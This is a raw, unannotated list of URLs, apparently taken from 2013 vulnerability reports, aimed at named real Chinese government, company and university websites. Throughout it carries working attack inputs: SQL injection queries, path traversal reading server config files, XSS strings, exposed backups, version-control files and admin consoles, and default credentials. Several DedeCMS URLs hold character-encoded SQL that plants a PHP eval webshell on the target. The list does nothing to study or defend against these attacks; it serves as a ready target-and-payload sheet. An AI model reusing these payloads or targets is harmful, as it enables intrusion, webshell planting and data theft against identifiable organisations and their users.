http://mall.uc.cn:8020/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media&CurrentFolder=%2F www.pcbpartner.com.cn http://www.pcbpartner.com.cn/web/pinke/index.action http://125.70.9.159/list.aspx http://www.szpay.net/login_news.action http://www.ccshcc.cn/news-more.asp?id=1273%20and%201=1%20&smallclassname=%B9%AB%CB%BE%D2%AA%CE%C5 http://www.ccshcc.cn/admin/login.asp http://wxtao.sinaapp.com/1.js http://support.netgear.com.cn/kb_web_files/search.asp http://support.netgear.com.cn/doucument/More.asp?id=1874 https://www.cnseu.org/forum.php?mod=viewthread&tid=1977&extra=page%3D2 http://www.oppo.com http://telpay.lakala.com/kfn/loginAction.action http://www.kingbase.com.cn/yingpin.php?type=sh&id=7 
https://www.cnseu.org/forum.php?mod=viewthread&tid=1936&extra=page%3D1 http://www.honren.com.cn/index.action http://chidt.house.sina.com.cn/news_list.php?type=1&tech=1 http://mcms.auto.ifeng.com/index.php http://img.auto.ifeng.com/uploadfile/2013/0613/20130613101540656.html https://www.cnseu.org/forum.php?mod=viewthread&tid=1937&extra=page%3D1 http://dealer.auto.ifeng.com/admin/js/ckfinder/ckfinder.html http://dealer.auto.ifeng.com/upload/user/files/20130613_194145.jpg/.php https://www.cnseu.org/forum.php?mod=viewthread&tid=1432&highlight=%E7%99%BE%E5%BA%A6 http://app.book.ifeng.com/poem/index.php?_c=admin&_a=list&type=poetry http://rddp.midea.com.cn:9083/rtssh/LoginAction.action http://lcab.ccidnet.com/data/mysql_error_trace.inc http://chall.3owl.com/ http://www.fssia.org/info.asp?TT=5&SS=0%2B0%2B0%2B9 http://61.178.24.86/webShop/flowCard/gotoIndex.action?productBigType=7&configId= http://gs.189.cn/ http://gs.189.cn/webShop/flowCard/gotoIndex.action?productBigType=7&configId= http://61.178.24.86/webShop/flowCard/gotoIndex.action?productBigType=7&configId= http://bbs.360safe.com/member.php?mod=logging&action=logout&.jpg http://%62%62%73%2E%33%36%30%73%61%66%65%2E%63%6F%6D/%6D%65%6D%62%65%72%2E%70%68%70?%6D%6F%64=%6C%6F%67%67%69%6E%67&%61%63%74%69%6F%6E=%6C%6F%67%6F%75%74&.jpg http://photo2.idate.163.com/album/41/89/4/46f876053ff4b1aa55a70a4b1298967b/27620489//lit/PORTRAIT_CERT_BR http://218.69.33.1/ http://61.181.141.65/ http://www.cszx.gov.cn/ http://www.cszx.gov.cn/admin.rar http://www.cszx.gov.cn/cszx.gov.cn.rar http://zone.wooyun.org/content/4228 http://jifen.womai.com/index.php URL:http://jifen.womai.com/share.php?activity=6&code=13055364&mid=0 http://www.yczzb.gov.cn/ http://www.yczzb.gov.cn/photovote/data/Xiao5u.mdb http://www.yczzb.gov.cn/news/post.php http://www.yczzb.gov.cn/news/member/post.php?job=postnew&fid=4 http://www.yczzb.gov.cn/hsyf_admin/ http://yktadmin.zoosnet.net/ http://yktadmin.zoosnet.net/web.config http://yktadmin.zoosnet.net/admin.rar 
http://yktadmin.zoosnet.net/LR_Admin/login.aspx http://bk.shenzhenpost.com.cn/bkweb/webpage!toHomePage.action http://cn.pub.vpon.com/login.action http://fcgyyy.com/admin/ http://qyxx.edugd.cn/topic.php?channelID=3&topicID=99 http://qyxx.edugd.cn/topic.php?channelID=3&topicID=99 http://qyxx.edugd.cn/topic.php?channelID=3&topicID=99 http://www.cardesales.com/Product/Mobile/OperationProcess.html http://neclub.netgear.com.cn/nebs/downloads.asp?PageIndex=100&ID=20 http://60.28.61.198:8000/MessageBord/ContentReply.aspx?id= http://guozhan.sanguosha.com/ http://zone.wooyun.org/content/4226 http://poobbs.com/account/resetpwd/mid/a5148ecf1c9f85aadcf0e2feb881df73 http://www.jste.net.cn/uids/login!login.action http://exam.szzfgjj.com/login.do http://youxi.baidu.com/yx/select/ http://event.youku.com/siemens-home/openthekitchen2013/save.php?action=videourl&id=1 http://weban.whjs.gov.cn:8080/aqold/ http://gkpj.scnu.edu.cn/NewsPress.aspx?tid=2 http://gkpj.scnu.edu.cn/admin/login.aspx http://minisite.youku.com/app/index.php?act=api_youku_video&operate=single&vid=1 http://cpi.11185.cn/order/viewOrder.html?orderId=Y1306091652259132016 http://cpi.11185.cn/order/pay.action?orderId=Y1306091652259132016 admin5.com/data/mysql_error_trace.inc http://www.ccard.net.cn/ccard/coverdetails/fullCover!getCardFromCover.action?coverid=4a4ffa1639d39e3f0139e1b72bca0378&categoryid=402848f139ae06630139b4437d2c0014 http://www.ccard.net.cn/ccard/covers/product!productConte.action?productId=ff8080813d0cdb89013d3f0145f2040f http://www.ccard.net.cn/ccard/coverdetails/fullCover!getfullcover.action?categoryid=4a4ffa1639d39e3f0139e21735ba03d6%27%20-- http://www.ccard.net.cn/ccard/html/pages/emailInput.jsp www.ccard.net.cn/ccard/Login/userLogin!jiaoYanEmail.action?userId=用户编号 http://www.ccard.net.cn/ccard/showItem/item!getContent.action?sysItemvalueid=ff8080813c6091e8013c951a54df0dcc%27 
http://www.ccard.net.cn/ccard/cartpage/shopcart!viewProductPic.action?productId=ff8080813ef4bcdc013f283121e400d3%27%20and%201=1-- http://comment2.rayli.com.cn/js/ http://comment2.rayli.com.cn/json/hzp/ http://comment2.rayli.com.cn/json/ http://market2.yesky.com/currentplay/view/currentplayProduct/login.jsp http://mysoft.yesky.com/jsp/admin/login.jsp http://manage.jxs.yesky.com/jsp/olympic/login.jsp http://buy.yesky.com/jsp/dealer/login.jsp http://market2.yesky.com/currentplay/uploadfile/619/1252553039611116.txt http://219.239.88.35/repository/playproject http://admin.tianjimedia.com/system/list.jhtml user:root site:mail.sina.com.cn/apps/netdisk/download.php http://m0.mail.sina.com.cn/apps/netdisk/download.php?id=4363dc35ccf27edeb5a935cc79de32c7jRiN0027 d.youc.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35 d.youc.com/dede/ http://intra.ccidnet.com/jeeadmin/jeecms/login.do?returnUrl=/jeeadmin/jeecms/index.do http://blog.china.com/jsp/main/channel/lastUpdateBlog.html www.china.com这个网站是国际范儿的,随时可能被国外hack盯上 http://www.189.net.cn/189.rar 
http://www.xhgjyc.com/show.asp?id=374 http://tenxing.ax.lt/ http://www.shopex.cn,闲来无事友情检测下,是个Dedecms,本以为管理员安全会做的很好,哎,直接秒爆管理账户密码,汗,做到此就不继续了,只做安全检测,若被不法分子利用漏洞,拿下服务器搞破坏不在话下,希望管理员能意识到网站的安全性,谢谢! http://server.zzidc.com http://www.gdfc.org.cn http://www.hljlsj.gov.cn/fileup.aspx http://210.51.19.97/test/ http://210.51.19.97/test/soft/中ymy.ftp ftp://bj.video.chinanews.com http://bj.video.chinanews.com:8090/ ftp://hkftp.phoenixtv.com http://www.fsgjj.gov.cn/article.do?id=8a8a8a813bd5977b013bd662017f28e0 http://60.217.44.4/login.jsp http://vote.runsky.com/2012/05/pijiu/index.php?app=baby&act=babybm http://www.lydrc.gov.cn/ http://www.lydrc.gov.cn:8008/key/index.shtml http://58.19.117.116/ http://wap.91160.com/index.php?c=account&a=orderinfo&yuyueid=101361855 http://product.yesky.com/front/productprice/productprice.do?productid=205502 http://events.youku.com/chery_riich/ http://dd.jm.e21.cn/web/content.php?id=25224 http://e-learning.cnpc.com.cn/jsp/sys/printProp.jsp http://e-learning.cnpc.com.cn/jsp/sys/prop.jsp http://e-learning.cnpc.com.cn/resource/ http://e-learning.cnpc.com.cn/jsp/index3.jsp http://e-learning.cnpc.com.cn/jsp/index2.jsp http://loto.sina.cn/index!simple.do?agentId=14759&vt=4 http://fota.suning.com Admin:Administrator http://ewp.suning.com.cn/app/plugins/download.jsp http://oa.suning.com.cn http://222.44.63.253/login.action http://www.szcert.org:8080/ http://www.szcert.org:8080/acnps/ http://www.szcert.org:8080/szcert/ http://www.szcert.org:8080/szcert/SZCERT/newsContent.jsp?newsId=2428&categoryId=8 http://www.szcert.org:8080/acnps/newsContent.jsp?newsId=696&categoryId=13 http://zfcg.nen.com.cn/houtaiguanlixitong/managerlist.jsp http://lngp.nen.com.cn/ http://shenbao.sc-n-tax.gov.cn/jsp/system_info/info_xx.jsp?CZWDBH=20121001999999999000000001 http://shai.goodbaby.com/tuku/?category=2 http://shai.goodbaby.com/tuku/?category=2 http://124.42.127.141:8080/questionnaire/index.php?questionnaireId=2没过滤导致,现如今这个修复了。可是,后面的呢? 
http://124.42.127.141:8080/questionnaire/qi.php?questionnaireId=1&uId=8dfc7ab4-279d-1031-8b89-001cc4d76f24 http://decoclub.ellechina.com union.xiu.com/sina/redirect.action http://zj.12530.com/wap/ring/ringInfo.action?ringIndex=5757973 http://zj.12530.com/wap/ring/ringInfo.action?ringIndex=5757973 http://www.hnssl.com/test_physics/login.asp http://www.hnssl.com http://ir.anta.com/tc/home.php?option=4&Itemid=160565 site:img1.house365.com filetype:txt skyclass.net/newsview.php?nid=203 http://121.28.141.36:8080/ www.aucma.cn/index.php?act=showgoods&i=88 http://deals.sina.com/exec/fwd.php?id=1 http://drops.wooyun.org/papers/59 http://www.comexe.cn/ns.php?sid=25 http://dns0755.net/help_list.php?ids=1009'%E2%80%98&con=index&mes_title=%BF%EC%CB%D9%B0%EF%D6%FA http://expert.ccidnet.com/expert/public.php?eid=1535 http://zk.czedu.gov.cn/datashow.asp?ID=655 http://www.cppc.gov.cn/news_play.asp?id=845 http://www.hi.jcy.gov.cn/view_rdjj.php?xuh=8706 http://crm.metalchina.com/ http://scuda.sina.com.cn/unilogin/.svn/text-base/INSTALL.txt.svn-base http://scuda.sina.com.cn/unilogin/backup/ http://scuda.sina.com.cn/unilogin/.svn/列目录 http://nsr.sina.com.cn/robots.txt/x.php http://www.bjxgt.gov.cn/i/?u=Qy-3-28-437?hd.vip.yy.com http://www.jhwater.cn/web/net/water_cost_index.asp?icYhId=106203 http://www.dzswj.com/readnews.asp?id=125 http://www.dzswj.com/readnews.asp?id=217 http://www.dzswj.com/type.asp?id=13 http://www.dzswj.com/admin/uploadfile.asp?currentFolder=/upfiles/../ http://www.yunhosting.net/UserFiles/ http://www.yunhosting.net/UserFiles/e.asp;.jpg http://www.mrsta.com/%E9%83%A8%E7%BD%B2.txt http://www.mrsta.com/user/index.asp http://www.xjxfdh.com/readnews.asp?id=46 http://www.xjxfdh.com/readnews.asp?id=37 http://www.xjxfdh.com/type.asp?id=4 http://try.aili.com/usercenter/otherjour/1015756.html?page=2111111111111111111111111 
http://comment.aili.com/index.php?m=comments&content=rtytf111111111111ryr&anonymity=0&uname=admin&uid=1037158&oid=1079&sid=5&title=dfffffffffffffffff&jsonpcallback=jsonp1371457995977 http://www.oppobd.com/product-user-info.php http://www.cyjoycity.com/joy.php?id=4 http://222.85.126.230:8080/ekbs/ask/systemManageIndex.action?method=toSystemManageIndex http://upload.ccidnet.com/cases/admin/login.jsp http://goldpen.ccidnet.com/goldpen/admin/ http://info.womai.com http://t.hk.qq.com/ http://t.hk.qq.com/index.php/index/friend/follow/type/1/name/wooyun2 www.fjty.gov.cn/front/fwdtLawguide/list.do?searchType=1&searchbusiness=0 http://www.winenice.com/account/user_showUserInfo.shtml http://zone.wooyun.org/content/4261 http://www.93.gov.cn/ http://my.mbaobao.com/member/address/modify http://m.mbaobao.com/user/message/messageList.html?pageType=1 http://10010.ruyi.com/sdltq3/front/FrontPortalAction!index.action http://fw.zjfda.gov.cn/ http://elearning.teacher.com.cn/jmx-console/ http://jifen.24365pt.com/fck.jsp http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://www.wooyun.org http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://admin.soso.com http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://10.130.74.19 http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://w@w:10.130.74.19 http://mch.tenpay.com/?verify_code=1 http://221.179.9.21/bpss/gzsi/phone/.svn/text-base/login.jsp.svn-base http://product.eladies.sina.com.cn/probation.php?id=3938 http://product.eladies.sina.com.cn/interface/probation.php?_a=get_product_probation_list&product_id=3938&limit=10&callback=getProbationAssignList&rnd=993568&page=2 http://b2c.csair.com/B2C40/data/order/importPNR/getPnrRules.xsql?typeid=1 http://drops.wooyun.org/papers/64 http://www.91ri.org/3016.html http://shadu.baidu.com/statics/.svn/entries 
http://www.jiankongbao.com/feedback_reply.php?feedback_id= http://211.139.140.43/cutesoft_client/cuteeditor/load.ashx?type=image&file=../../../web.config http://ipv6te.bnu.edu.cn/index.action http://www.e-xxcs.cn/ http://ccidstudy.ccidnet.com/ http://qc.homeinns.com/Login.aspx http://tieba.baidu.com/p/2401973084 http://tieba.baidu.com/p/2395449386#J http://tieba.baidu.com/p/2369003726#b site:sto.cn http://tuya.games.sina.com.cn/graffito_detail.php?wid=37519 http://tuya.games.sina.com.cn/graffito.php?tid=36&author=5352 http://121.14.4.245:81/ http://121.14.4.245:81/upload.do?method=uploadDcp&domainStr={域名}&pwd={与域名有关系的密码}&rad=0.13187121579596306 http://wap.sogou.com/tc?url=http%3A%2F%2Fno.sohu.com%2F http://www.supor.com.cn/knowledgeread.php?infoID=366 http://www.supor.com.cn/admin/Default.htm http://stmp.moe.edu.cn/user!login.do site:www.hebeieol.com inurl:php http://aqbzh.chinasafety.gov.cn/sps/loginaction!login.action http://www.nm-n-tax.gov.cn/interview/interview!main.action?COLLCC=3197299591&siteroot=nmgsj http://www.dingxing.gov.cn/index.action http://wap.sm.gov.cn/news/mayor-mail.action?columnNum=1447&page.pageNo=6 http://www.qinghu.gov.cn/email.action;jsessionid=85D95C6FB39405837C5982CBD2986989 http://www.sjzysgx.gov.cn/about/about!office.do http://www.renren.com/{myID}#//status/status?id={yourID http://t.hk.qq.com/index.php/index/t/del/tid/1234567890 index.php/index/t/add http://t.hk.qq.com http://t.hk.qq.com/index.php/u/littlebirb http://t.hk.qq.com/index.php/index/t/add?type=2&content=aaa&reid=1234567890&format=html 
http://www.zs.zhaozhou.gov.cn//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://http://www.zs.zhaozhou.gov.cn/plus/mytag_js.php?aid=9013 http://www.zs.zhaozhou.gov.cn/plus/90sec.php 
http://www.golf008.com/admin.php,后台mysql,loadfile什么的地址都好找,不演示了,就贴个图就都明白了。 http://www.youximenhu.com/index.php?m=Center&a=message http://ccidthinktank.net/plus/view.php?aid=3359&tyid=144 http://www.ccidthinktank.com/plus/view.php?aid=3359&tyid=144 http://ccidthinktank.net/plus/list.php?tid=42&id=41 http://www.ccidcall.com.cn/news_read.asp?id=120 http://expert.ccidnet.com/expert/list.php?tid=38761 http://member.echinatobacco.com/docs/funcspecs/下有几个比较邪恶的文件,我猜是被入侵了。 http://stock1.sina.cn/dpool/stock_new/v2/live_q_add.php?spec_type=forex&vt=4&wm=1223 http://stock1.sina.cn/dpool/stock_new/v2/live_q_list.php?spec_type=forex&vt=4&wm=1223 http://wo.10010sh.cn/emp/woLoginAction_checkUserName.action www.ccidnet.com xxx.com/xxx/的类型。。。求改进 http://123.233.245.154:8080/pims/ ftp://121.199.12.185 http://re.meizu.com/Default.aspx?barCode=%22%3E'%3E http://app.meizu.com/search/0?key=%22%3E'%3E%3Ciframe/src=//tmxk.org%3E http://developer.meizu.com/faq/faq_toquiz.jsp?keyWord=%3E'%3E%3Cembed%3E http://app.meizu.com/906003 http://developer.meizu.com/faq/faq_content.jsp?questionId=408001 http://developer.meizu.com/faq/faq_personquiz.jsp http://view.sina.cn/h5/article.php?section_id=218&id=37582 http://127.0.0.1/price.asp?anid=63 http://down.chinaz.com/soft/30676.htm http://mo.amap.com/?q=31.234527,121.287689&name=park&dev=0 http://api.amap.com/URI/browser_guide) http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x05.txt http://mbsky.com/ http://www.52fangwu.com)。 http://admin.xdf.cn/admin/存在dede的getshell漏洞,成功拿到shell http://www.nongmintv.com/v/digg.php?con=1&id=1 http://www.now.cn/domain-admin/domainManage.net?IDDomain=域名id http://www.now.cn/pay/renew.net?idGUser=n+域名id http://pay.youku.com/inpour/index.html?method=tenpay http://oa.cashchina.cn:8080/web-console/ http://dmp.www.net.cn/order/operaterecords/S201303271308824 http://act.52pk.com/spe/search/link.php?id=59 IP:115.182.53.65 Server:nginx Powered-by:PHP/5.2.14 Server:MySQL http://admin.eguan.cn/pl_all.php 
http://admin.eguan.cn/pl_del.php?pid=此处为评论ID,可遍历 http://www.kchance.com/nvision_details.asp?id=1859 homepage.php/[用户名]/member-profile http://php168.cn/com/homepage.php/admin/member-profile http://zc.yundasys.com/ts/user/user_ts_detail.php?tsid=306623 https://www.dnspod.cn/tools#/west263.com http://iphone.10010.com/WEB-INF/web.xml http://iphone.10010.com//WEB-INF/classes/jdbc.properties http://iphone.10010.com//WEB-INF/spring-cfg/applicationContext.xml http://buzz.youku.com/.svn/entries http://buzz.youku.com/newsletter_new_6_6.sql http://show.aili.com/index.php?m=cont_create&index&a=del_pic&pic_path=.%2Fuploadfile%2F2013%2F619%2F1234567890.jpg http://show.aili.com/index.php?m=cont_create&index&a=del_pic&pic_path=.%2Findex.php http://app.gd.sohu.com/minisite/yida/20090801/index_list_json.php?pagenumber=1 http://app.gd.sohu.com/minisite/yida/20090801/index_list_json.php?pagenumber=10000000 http://180.153.132.52/invoker/JMXInvokerServlet http://180.153.132.75/invoker/JMXInvokerServlet http://180.153.132.81/invoker/JMXInvokerServlet http://www.metasploit.com/modules/exploit/multi/http/jboss_invoke_deploy http://gmail.sina.net/main/control/agents.php http://agent.hc360.com/test.aspx?name=1 http://wooyun.org/bugs/wooyun-2013-026152,有人回复对爱丽网进行了注射 http://member.aili.com/p/xxoo13 http://zzzs.hhyedu.com.cn/admin http://2010.tudou.com/nba/ajax.php http://zzjyt.haier.net/btb_xls/ http://tj.xywy.com/tjcx/admin/index.php http://www.3news.cn/plus/90sec.php http://service.cellcom.com.cn/)的软件开发商开发的业务管理系统。其中有一个已经被爆了,详细内容请移步 http://survey.sohu.com/config.inc.php.bak http://xxx.com/front/memberfront/memberFront_vipLogin.do http://huodong.56.com/huati/79?do=videoList&p=81 http://61.132.94.6/ioa/book/ http://qiantu.xdf.cn/webrms/Question/Answer3.jsp?QuestionSort=0 http://product.aili.com/cosmetics/show/annasuFn/7533.html来演示 http://www.mafengwo.cn/u/19222798.html http://www.5rao.com/ http://xinshuitang.com/NewFile.txt http://www.sdcncsi.com.cn/content.jsp?col=002&artid=138 
http://xb.hebtu.edu.cn/news_browse.asp?id=123 http://xb.hebtu.edu.cn/admin/login.htm http://202.206.108.10/admin.php?mod=phpcms&file=login http://www.rsdtxsf.com/news_view.php?cid=2&nid=146 http://www.shxstm.org.cn http://www.kjg.so http://10010.bbn.com.cn/index.php?s=/CliUser/bindphone/userid/201206072104100933 http://127.0.0.1:5656/shopex/api.php inurl:ConsolidatedLogin/html/loginInput.action inurl:loginInput.action http://area.autodesk.com/存在漏洞的链接为 http://area.autodesk.com/ConsolidatedLogin/html/loginInput.action https://ssso.autodesk.com/存在漏洞的链接为 https://ssso.autodesk.com/ConsolidatedLogin/html/loginInput.action http://tuchong.com/342390/ http://item.taobao.com/item.htm?spm=a1z10.3.w4002-2413729824.9.4V5gj0&id=25924204490 http://tbobn.net/aixinj/101914975.js http://vdisk.weibo.com/s/GEtOM http://localhost/test/ecshop/flow.php?step=add_to_cart http://bm.bjmzdx.org:8080/reg.action http://www.tongbu.com/api/tracker.aspx?lurl=http://qd.leaderhero.com/qd/tui/tbtui_v2.10.ipa&site=open_ipa.html&title=%u935a%u5c7e%ue11e%u93ba%3f&type=soft&_r=1371710065758 http://s.tongbu.com/s?deviceid=1&clienttype=2&key=l http://bbs.tongbu.com/forum.php http://bbs.tongbu.com/forum-26-1.html http://www.hedalu.gov.cn/list!detail.action?nav0.id=79&nav1.id=81&info.id=605 http://www.51upnet.com/list.asp http://www.tc56.com:8080 admin:123456 
http://topic.xywy.com//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.90sec.org/plus/mytag_js.php?aid=9013 http://www.90sec.org/plus/90sec.php http://topic.xywy.com//plus/conn.php 
http://maillist.snda.com/ http://alis.annto.com.cn:83/alis3/login.action http://alis.annto.com.cn:81/alis3/login.action http://sbc.nbu.edu.cn/article/file/cid/4710/?file=../../../../application/config/config.ini.php&method=out http://ads.admin5.com/ ads.admin5.com/plus/90sec.php http://www.mafengwo.cn/event/event.php?iid=1307939 www.gzds.gov.cn http://www.gzds.gov.cn/search/infoviewsearch.jsp?randomserial=1 http://localhost/mobile/user.php?act=register http://it.sto.cn:8080/lxb/zgslxb.php http://it.sto.cn:8080/lxb/zzb_select.php http://it.sto.cn:8080/lxb/pq_select.php http://it.sto.cn:8080/lxb/xbm.php?dbm=高管 http://60.31.214.34/display.action http://hy.shenzhenpost.com.cn/shop/member!passwordRecover.action http://vip.abcc-club.com/shop/member!passwordRecover.action http://zhidao.www.dianping.com/robots.txt/a.php http://others.sports.sina.com.cn/cva/paper.php?id=264 url:http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609 http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609 http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609 http://data.auto.sina.com.cn/complaint2012/getdetail.php?id=13718135161609%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- http://data.auto.sina.com.cn/complaint2012/getcomplaints.php http://member.aili.com/p/?a=lists&c=member&cateid=721&m=room&username=123 http://m.3g.qq.com/account.html?uid=xxx1&fr=2&aid=xx http://m.3g.qq.com/cgi-bin/general.cgi?uid=#{uid}&sid=&fr=2&ft=0&aid=#{aid}&cgi=follow&stid=#{stid http://www.mwines.com.cn/shop/member!passwordRecover.action http://recommend.womai.com:1107/recommender/ http://recommend.womai.com:1107/recommender/recommend http://pic2.womai.com/.bash_history http://it.sto.cn:8080/lxb/update.php?id=13 http://oa.sto.cn/e3oa/index.asp http://60.191.59.12:8000/page/gps/LoginGPS.aspx?NextLink=main%2fmonitor.aspx http://222.66.109.136:8088/hr/zzbyuangong_all.action 
